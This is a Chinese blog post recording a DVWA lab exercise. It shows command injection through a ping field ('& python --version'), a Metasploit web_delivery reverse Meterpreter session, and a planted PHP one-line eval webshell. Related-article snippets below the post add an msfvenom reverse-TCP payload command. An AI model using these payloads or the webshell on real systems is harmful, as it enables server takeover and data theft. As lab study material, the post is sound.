学习记录:通过MSF利用Web代码注入渗透服务器

最新推荐文章于 2023-11-17 09:09:55 发布
最新推荐文章于 2023-11-17 09:09:55 发布
阅读量1.2k 收藏 9
点赞数 17
分类专栏: 信息安全 文章标签: 学习 网络安全 web安全 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60709081/article/details/131086964
版权
本文是一个新手的学习记录,通过DVWA平台,利用Metasploit(MSF)框架对Web代码注入漏洞进行渗透测试。作者在Windows靶机上发现Python环境,生成MSF的反向连接代码,成功获取Meterpreter会话,但由于权限限制未能进一步提权。此外,还介绍了上传WebShell(一句话木马)的方法,以及由此带来的系统风险。
摘要由CSDN通过智能技术生成

DVWA学习记录:通过MSF利用Web代码注入渗透服务器

_> 写在最前

小白第一次写学习记录,文中不足之处还请多多见谅。

1. 环境介绍

  • 靶机: Windows 10 专业版 22H2
  • 攻击机:Kali
  • 网站软件:PhpStudy
  • 靶场:DVWA
    就不演示搭建过程了(主要是懒)。

2.测试网页介绍

本次测试的网页如下:
Alt
难度等级:Low
主要是学习怎么用代码注入和MSF的结合去控制主机(当然用WebShell去连接更简单)

  • 首先分析此页面使用的是命令拼接的方式来实现功能的,所以我在正常的Ping xxx 后面又加上了 “&” ,由此尝试可不可以执行别的命令,结果如上图。
//  输入的语句
baidu.com & python --version

点击Submit, 发现返回了Python的版本号!

3.游戏开始

可以得出,服务器上是安装了Python的,我电脑确实是如此。
在这里插入图片描述

既然都那么痛快了,就利用MSF来生成反向连接代码吧!

4.使用MSF生成注入代码

打开Kali虚拟机
启动MSF
在这里插入图片描述
搜索 Exploit 模块中的 web_Delivery

在这里插入图片描述

使用该模块,设置基本参数
在这里插入图片描述
查询本机ip地址并填入
在这里插入图片描述
确认生成为Python代码
在这里插入图片描述
关键时刻!!!! 创建监听,然后提交代码
在这里插入图片描述
网页一直在加载,回到Kali这边 目标已上线!
在这里插入图片描述
成功获取到Meterpreter,但却是python/windows会话,查看sysinfo
python类型的Meterpreter对话功能较少,本地尝试提权失败,只能考虑用这个会话再上传免杀木马了,但现在的免杀基本上刚发出来没几天就可能寄掉,鄙人新人一枚,无奈实验到此结束

(其实是因为某白痴费劲心思做的免杀却被无情干掉的痛`(>﹏<)′)静态可免杀,动态就被火绒干掉了,等以后再好好学免杀。)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5.但是!

但还可以上传 一句话木马 来救一救的嘛,无所谓了挣扎一下,早点去刷B站ヾ(≧▽≦)o*

<?php eval($_POST['jntm']); ?>

把webshell.php就藏再站点目录里,然后用蚁剑连接一波
在这里插入图片描述
就挺突然的,我整个电脑的硬盘都已经暴露了,可以一览无余

6.总结

本次学习记录就到此结束了,本人实在是没入门的小白,不过每天学习,每天进步,加油!
挺喜欢Kali的新壁纸的,上面写着一句话:

“The quieter you become, the more you are able to hear”

免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。

VHK701
关注
  • 17
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MSF渗透之旅
prettyX的博客
12-30 465
渗透基础 1、show命令 Metasploit框架中包含数百个模块,没有人能用脑子把他们的名字全部记下来。在MSF终端中,运行show命令会把所有模块显示出来。 show exploits //会显示MSF中所有可用的渗透攻击模块 show auxiliary //会显示所有的辅助模块以及它们的用途 show options //保证MSF框架中各个模块正确运行所需的各种设置...
msf生成webshell_MSFWeb渗透
weixin_36212560的博客
01-13 812
WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...
msfweb:一个简单的容器,用于构建Metasploit框架并通过Web TTY使其可用
02-18
:syringe: msfWeb :spider_web: 一个简单的容器,用于构建Metasploit框架并通过Web TTY使其可用 该项目的目的是在参与过程中快速使用metasploit,而无需ssh或完整的工作站。 以这种方式使用框架具有一些优势 易于部署 可通过任何Web客户端(移动,智能电视等)访问 本机代理支持/绕过防火墙 成分 Metasploit-用于开发,测试和执行漏洞利用的软件平台-https: https://github.com/rapid7/metasploit-framework.git GoTTY-通过浏览器共享您的终端https://github.com/yudai/gotty 用法 拉容器图像 docker pull 0daysimpson/msfweb 运行容器 docker run -d -p 8080:8080 0daysimpson/msfweb 访问网络应用 http
Web安全渗透全套教程 [1/40]
捡破烂日记^ ^
04-12 3548
安全渗透环境准备虚拟机:一、攻击机(渗透机):kali二、靶机1:OWASP_Broken_Web_Apps三、靶机2:win7 虚拟机: 注: 预装vmware; 一、攻击机(渗透机):kali 下载链接:https://cdimage.kali.org/kali-2021.1/kali-linux-2021.1-installer-amd64.iso 二、靶机1:OWASP_Broken_Web_Apps 下载链接:https://jaist.dl.sourceforge.net/project/owa
MSF-从webshell到完全控制
scrawman的博客
01-18 891
文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 5154
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
Windows 免费渗透测试套件,包含140多款工具
dzqxwzoe的博客
02-28 721
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。虚拟机环境配置成功后,以下所有的步骤均在该环境中操作。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
无人驾驶算法学习:多传感器融合MSF算法
01-28
代码实战部分,MSF-ETH-SAL是用于实现MSF算法的一个开源库,它提供了相机和IMU融合的示例。通过编译和运行该库,可以直观地理解MSF算法的工作流程,包括如何调用预测和更新函数,以及如何处理不同传感器的数据。 总...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
metasploit_data_models:MSF数据库代码,gemized
04-08
允许在Metasploit框架(MSF)和Metasploit的商业版本(社区,Express,Pro –通常统称为“ Pro”)之间共享代码 为开发人员提供一个轻量级的MSF后端入口点,以用于开发工具,该工具收集旨在供以后与Metasploit配合...
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2414
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery 当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
MSFWeb 后门
weixin_46104215的博客
11-21 1884
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
Windows提权—进程注入、Unattended Installs提权
negnegil的博客
09-12 928
进程注入提权 使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限 注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现 下载pinjector.exe https://www.tarasco.org/security/Process_Injector/index.html 上传 pinjector.exe到靶机可执行目录 ##列取所有进程 pinje
msf注入payload
whojoe的博客
11-19 489
msf注入payloadbash参考文章 bash use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.3.1 set lport 12121 set session 1 参考文章 https://www.cnblogs.com/hcrk/p/14419762.html ...
渗透测试神器-msf基础
qq_51796436的博客
12-01 5151
渗透测试在远控,权限维持阶段不可避免的要用到msf,在awd中也会经常用到,msf的功能不可谓不强大
MSF(Metasploit)渗透测试---黑客工具使用指南
最新发布
GitHub质检员
11-17 524
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。
使用msf入侵多层级网络架构
热门推荐
06-01 2万+
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?首先,我们通过Web入侵获得Server1权限,并...
DVWA(Web 渗透的靶机环境)+csrf漏洞练习
net的博客
03-16 2807
用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。十个攻击模块,分别是:1、Brute Force(暴力(破解))、2、Command Injection(命令行注入)、3、CSRF(跨站请求伪造)、4、- File Inclusion(文件包含)、5、File Upload(文件上传)、6、Insecure CAPTCHA (不安全的验证码)、
Web渗透面试精华:MSF与Burp工具详解与信息收集策略
Web渗透测试面试集锦中,主要关注两个核心部分:MSF(Metasploit Framework)和Burp Suite的使用,以及渗透测试中的信息收集与漏洞扫描策略。 1. MSF与Burp Suite相关问题: - Burp Suite 是一款强大的Web应用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值